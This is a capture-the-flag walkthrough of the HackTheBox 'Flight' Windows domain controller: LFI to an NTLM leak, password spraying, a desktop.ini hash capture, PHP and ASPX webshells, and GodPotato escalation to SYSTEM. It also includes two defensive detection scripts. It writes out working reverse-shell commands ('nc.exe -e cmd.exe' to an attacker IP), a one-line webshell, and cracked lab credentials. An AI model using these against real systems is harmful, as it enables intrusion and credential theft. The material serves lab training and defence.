Flight
Hard · Windows · Active Directory · LFI · NTLM · Password Spray · GodPotato · HackTheBox
Hard Windows Active Directory machine with a long but logical chain. A PHP ?view= parameter accepts UNC paths — pointing it at Responder captures an NTLMv2 hash for svc_apache. Password spray hits S.Moon, who can write to a Shared share. A malicious desktop.ini captures c.bum's hash, giving write access to the Apache webroot. A PHP webshell lands a shell as svc_apache. RunasCs pivots to c.bum, who can write to IIS's development root on port 8000. A chisel tunnel exposes the internal port, an ASPX webshell runs as the IIS AppPool with SeImpersonatePrivilege, and GodPotato escalates to SYSTEM.
User Flag
C:\Users\C.Bum\Desktop\user.txt
Root Flag
C:\Users\Administrator\Desktop\root.txt
01 Reconnaissance

Full port scan confirms a Domain Controller. The web server on port 80 is Apache 2.4.52 with PHP 8.1.1 serving a static "g0 Aviation" site. Domain is flight.htb.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.228.120
53/tcp   open  domain        Windows DNS
80/tcp   open  http          Apache 2.4.52 (PHP 8.1.1) — "g0 Aviation"
88/tcp   open  kerberos-sec  Windows KDC
389/tcp  open  ldap          Active Directory (Domain: flight.htb)
445/tcp  open  microsoft-ds  SMB (signing required)
| clock-skew: +6h58m
clock skew ~7h: Kerberos requires clocks within 5 minutes of the DC. If you hit KRB_AP_ERR_SKEW, sync first: sudo ntpdate -u 10.129.228.120. NTLM-based attacks are unaffected by skew.
env setup
$ echo "10.129.228.120 flight.htb" | sudo tee -a /etc/hosts
$ export IP=10.129.228.120
$ export DOMAIN=flight.htb

SMB null auth works (the login succeeds), but share enumeration and RID brute-forcing are denied. Guest is disabled. We need credentials first — the web app is the way in.

02 VHost Discovery — school.flight.htb

The main site is a static brochure — no PHP endpoints, no login forms. Fuzz the Host header to discover other virtual hosts on the same IP.

ffuf — vhost fuzzing
$ ffuf -u http://flight.htb/ -H "Host: FUZZ.flight.htb" \
    -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
    -t 100 -mc 200,301,302,403 -fs 7069
school [Status: 200, Size: 3996]
common mistake: don't fuzz via http://FUZZ.flight.htb/ in the URL — that relies on DNS resolving the subdomain. Always use -H "Host: FUZZ.flight.htb" against the IP and filter by size to remove the baseline response.
add vhost
$ echo "10.129.228.120 school.flight.htb" | sudo tee -a /etc/hosts

school.flight.htb is a PHP site with a ?view= parameter — a classic LFI candidate.

03 LFI → UNC Path → NTLM Hash (svc_apache)

The ?view= parameter loads local files — confirmed by reading the hosts file directly. Because PHP's include() hands the path to the Windows file API, it also accepts UNC paths. When PHP on a Windows server tries to open \\attacker\share, Windows initiates an SMB connection to that host and leaks the web server account's NTLMv2 hash.

confirm LFI
$ curl "http://school.flight.htb/index.php?view=c:/windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp...
127.0.0.1 localhost
responder — start listener
$ sudo responder -I tun0 -v
trigger UNC path via LFI
$ curl "http://school.flight.htb/index.php?view=//10.10.14.78/share"
[SMB] NTLMv2 Hash : svc_apache::flight:aad3b435...(hash)
hashcat — crack NTLMv2
$ hashcat -m 5600 ntlm_hash /usr/share/wordlists/rockyou.txt
svc_apache::flight:...:S@Ss!K@*t13
credential: svc_apache:S@Ss!K@*t13. NTLMv2 mode is -m 5600 — not to be confused with NTLMv1 (-m 5500) or Net-NTLMv2 relay attacks.
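From the defender's side, as an added example that is not part of the original writeup: a Python scanner over constructed Apache access-log lines that flags view= values carrying a UNC host, an absolute path, traversal, or a PHP stream-wrapper prefix, the shapes a log alert or WAF rule for this LFI would key on. It assumes Apache's combined log format; the sample lines are constructed to mirror the requests above, and it goes slightly beyond the page by also catching traversal and wrapper prefixes.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format (the page's web server is Apache 2.4 on Windows).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# A legitimate view value is a bare page name; none of these shapes should appear in it.
UNC_RE = re.compile(r"^(?:\\\\|//)[^\\/]+")           # \\host\share or //host/share
ABS_RE = re.compile(r"^(?:[a-zA-Z]:)?[\\/]")            # c:/windows/... or /windows/...
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # php://, data://, http://

def classify_view(value):
    """Label a suspicious view value, or return None for a plain page name."""
    v = unquote(value).strip()
    if UNC_RE.match(v):
        return "unc-path"
    if ABS_RE.match(v):
        return "absolute-path"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    if WRAPPER_RE.match(v):
        return "stream-wrapper"
    return None

def scan_access_log(lines):
    """Return (client_ip, label, decoded_value) for every flagged view parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in params.get("view", []):
            label = classify_view(value)
            if label:
                findings.append((m["ip"], label, unquote(value)))
    return findings

# Constructed sample lines modelled on the requests in this writeup.
SAMPLE_LOG = [
    '10.10.14.78 - - [22/Sep/2022:10:01:02 +0000] "GET /index.php?view=about.html HTTP/1.1" 200 3996',
    '10.10.14.78 - - [22/Sep/2022:10:01:09 +0000] "GET /index.php?view=c:/windows/system32/drivers/etc/hosts HTTP/1.1" 200 824',
    '10.10.14.78 - - [22/Sep/2022:10:01:15 +0000] "GET /index.php?view=//10.10.14.78/share HTTP/1.1" 200 3996',
    '10.10.14.78 - - [22/Sep/2022:10:01:21 +0000] "GET /index.php?view=..%2f..%2fphp%2fphp.ini HTTP/1.1" 200 512',
]
```

Running scan_access_log(SAMPLE_LOG) flags the second, third and fourth lines and leaves the plain about.html request alone; the UNC hit is the one worth an immediate alert, since it means the server just authenticated outbound.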
04 Password Spray → S.Moon → desktop.ini → c.bum

With svc_apache credentials we can enumerate domain users, then spray the cracked password across all accounts — service accounts often share passwords with regular users.

user enum + spray
$ nxc smb $IP -u svc_apache -p 'S@Ss!K@*t13' --users | awk '{print $5}' > users.txt
$ nxc smb $IP -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
[+] flight.htb\S.Moon:S@Ss!K@*t13
S.Moon share access
$ nxc smb $IP -u s.moon -p 'S@Ss!K@*t13' --shares
Shared    READ,WRITE

S.Moon can write to the Shared share. When a user browses a network share in Windows Explorer, their system auto-authenticates to load icons and thumbnails. Drop a desktop.ini pointing at our Responder to capture their hash.

desktop.ini — malicious icon path
$ cat > desktop.ini << 'EOF'
[.ShellClassInfo]
IconResource=\\10.10.14.78\share\icon.ico
EOF
$ smbclient //$IP/Shared -U 's.moon%S@Ss!K@*t13' -c "put desktop.ini"
responder captures c.bum's hash
[SMB] NTLMv2 Hash : c.bum::flight.htb:aad3b435...(hash)
hashcat — crack c.bum
$ hashcat -m 5600 hash2 /usr/share/wordlists/rockyou.txt
c.bum::flight.htb:...:Tikkycoll_431012284
c.bum share access
$ nxc smb $IP -u c.bum -p 'Tikkycoll_431012284' --shares
Web       READ,WRITE
credential: c.bum:Tikkycoll_431012284. The Web share maps to C:\xampp\htdocs — the Apache webroot. Write access here means code execution.
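Also from the defender's side, as an added example that is not the writeup's own code: a Python check that walks a share tree for desktop.ini files whose IconResource or IconFile points at a UNC host, the artefact the desktop.ini trick above leaves behind on the share. The share layout and both sample files are constructed; it also handles the UTF-16 encoding Windows often uses for desktop.ini.

```python
import configparser, os, re, tempfile

# Keys under [.ShellClassInfo] that Explorer resolves when rendering a folder;
# a UNC value makes the browsing user's machine authenticate to that host over SMB.
ICON_KEYS = ("iconresource", "iconfile")
UNC_RE = re.compile(r"^\\\\[^\\]+")  # \\host or \\host\share\...

def decode_ini(data):
    """Windows often writes desktop.ini as UTF-16 with a BOM; fall back to UTF-8."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")

def check_desktop_ini(text):
    """Return (key, value, host) for each icon key pointing at a UNC path."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if section.lower() != ".shellclassinfo":
            continue
        for key, value in cp.items(section):
            raw = value.split(",")[0].strip()  # IconResource may carry ",<index>"
            if key in ICON_KEYS and UNC_RE.match(raw):
                findings.append((key, raw, raw.lstrip("\\").split("\\", 1)[0]))
    return findings

def scan_share(root):
    """Walk a share tree and list every desktop.ini with a UNC icon path."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower() == "desktop.ini":
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    results += [(path, *f) for f in check_desktop_ini(decode_ini(fh.read()))]
    return results

# Constructed samples; the first mirrors the file planted in this writeup.
MALICIOUS_INI = "[.ShellClassInfo]\nIconResource=\\\\10.10.14.78\\share\\icon.ico,0\n"
BENIGN_INI = "[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n"

def demo_scan():
    """Build a throwaway share with both samples (one UTF-16 encoded) and scan it."""
    with tempfile.TemporaryDirectory() as share:
        for sub, text, enc in (("Shared", MALICIOUS_INI, "utf-16"), ("Docs", BENIGN_INI, "utf-8")):
            os.makedirs(os.path.join(share, sub))
            with open(os.path.join(share, sub, "desktop.ini"), "w", encoding=enc) as fh:
                fh.write(text)
        return [(os.path.relpath(p, share), k, v, h) for p, k, v, h in scan_share(share)]
```

Point scan_share at a mounted share root to get the same report for real folders; the constructed run reports only Shared/desktop.ini with host 10.10.14.78.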
05 PHP Webshell → Shell as svc_apache

The Web share is the Apache document root. Upload a PHP webshell and netcat into the school.flight.htb subdirectory.

smbclient — upload webshell + nc
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ smbclient //$IP/Web -U 'c.bum%Tikkycoll_431012284' \
    -c "cd school.flight.htb; put shell.php; put nc.exe"
note: the box periodically cleans uploaded files. If the webshell returns 404, just re-upload via SMB and retry.
verify RCE + get reverse shell
$ curl "http://school.flight.htb/shell.php?cmd=whoami"
flight\svc_apache
$ nc -lvnp 4444
$ curl "http://school.flight.htb/shell.php?cmd=nc.exe+-e+cmd.exe+10.10.14.78+4444"
06 RunasCs → c.bum + User Flag

From the svc_apache shell, internal recon reveals two important things: port 8000 is listening internally (IIS, not exposed externally), and c.bum has write access to C:\inetpub\development\ — the IIS app root on that port. We need to be c.bum to write there.

internal recon
C:\> netstat -ano | findstr LISTEN
TCP    0.0.0.0:8000    0.0.0.0:0    LISTENING
C:\> icacls C:\inetpub\development\
flight\C.Bum:(OI)(CI)(W)

RunasCs runs commands as another user without needing an interactive logon session — useful when you have credentials but no GUI or interactive shell. Upload it via the Web share and pivot to c.bum.

RunasCs → c.bum shell
$ nc -lvnp 4445
C:\xampp\htdocs\school.flight.htb> .\RunasCs.exe c.bum Tikkycoll_431012284 ".\nc.exe -e cmd.exe 10.10.14.78 4445" --logon-type 8
user flag
C:\Users\C.Bum\Desktop> type user.txt
************************
07 Chisel Tunnel + IIS ASPX Webshell

Port 8000 is firewalled externally. Use chisel to create a reverse TCP tunnel so we can reach it from Kali. Then deploy an ASPX webshell: this IIS instance does not serve PHP, so the payload has to be ASP.NET.

chisel — reverse tunnel
$ chisel server -p 9001 --reverse
C:\> chisel.exe client 10.10.14.78:9001 R:8000:127.0.0.1:8000

http://127.0.0.1:8000 on Kali now maps to port 8000 on the target. From the c.bum shell, copy the ASPX webshell, nc.exe, and GodPotato into C:\inetpub\development\:

deploy ASPX webshell to IIS root
C:\> copy C:\xampp\htdocs\school.flight.htb\shell.aspx C:\inetpub\development\shell.aspx
C:\> copy C:\xampp\htdocs\school.flight.htb\nc.exe C:\inetpub\development\nc.exe
C:\> copy C:\xampp\htdocs\school.flight.htb\GodPotato-NET4.exe C:\inetpub\development\GodPotato-NET4.exe
verify IIS identity + privileges
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami"
iis apppool\defaultapppool
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=whoami+/priv"
SeImpersonatePrivilege    Impersonate a client after authentication    Enabled
finding: IIS AppPool accounts almost always hold SeImpersonatePrivilege — they need it to impersonate authenticated web users. Combined with any potato exploit, SYSTEM is one command away.
08 GodPotato → SYSTEM

GodPotato abuses SeImpersonatePrivilege by tricking a SYSTEM-level COM server into authenticating to a fake endpoint we control, then stealing its token to run arbitrary commands as SYSTEM. Works on modern Windows without needing a writable named pipe.

get IIS shell + run GodPotato
$ nc -lvnp 4446
$ curl "http://127.0.0.1:8000/shell.aspx?cmd=C:\inetpub\development\nc.exe+-e+cmd.exe+10.10.14.78+4446"
C:\inetpub\development> .\GodPotato-NET4.exe -cmd ".\nc.exe -e cmd.exe 10.10.14.78 4447"
SYSTEM shell + root flag
$ nc -lvnp 4447
C:\> whoami
nt authority\system
C:\> type C:\Users\Administrator\Desktop\root.txt
************************
09 Full Attack Chain
attack chain summary
Nmap → DC on 10.129.228.120, Apache on port 80, clock skew ~7h
  │
  ▼
ffuf vhost fuzz → school.flight.htb discovered
PHP ?view= parameter → LFI confirmed
  │
  ▼
LFI + UNC path → Responder captures SMB auth
hashcat -m 5600 → svc_apache:S@Ss!K@*t13
  │
  ▼
Password spray → S.Moon:S@Ss!K@*t13
Shared share WRITE → desktop.ini (malicious icon UNC) → Responder → hashcat → c.bum:Tikkycoll_431012284
  │
  ▼
c.bum → Web share WRITE (C:\xampp\htdocs)
PHP webshell → shell as flight\svc_apache
  │
  ▼
RunasCs (c.bum creds) → shell as flight\c.bum → user.txt ✓
→ write access to C:\inetpub\development\ (IIS port 8000)
  │
  ▼
chisel reverse tunnel → port 8000 exposed on Kali
ASPX webshell deployed → iis apppool\defaultapppool
SeImpersonatePrivilege enabled
  │
  ▼
GodPotato → token impersonation → nt authority\system → root.txt ✓
key takeaways:
· Any PHP include() accepting user input can be pointed at a UNC path to leak NTLMv2 hashes on Windows
· Always spray every cracked password across all known users — service accounts often share passwords
· A malicious desktop.ini with a UNC icon path captures hashes from anyone who browses the share
· SMB write to a webroot = PHP code execution; check net share to map share names to local paths
· RunasCs enables lateral movement with known creds without needing an interactive session
· Always run netstat -ano from a foothold — firewalled internal ports often host the privilege escalation path
· IIS AppPool + SeImpersonatePrivilege + GodPotato = SYSTEM on any modern Windows version
· Chisel is the go-to for tunneling through firewalled internal services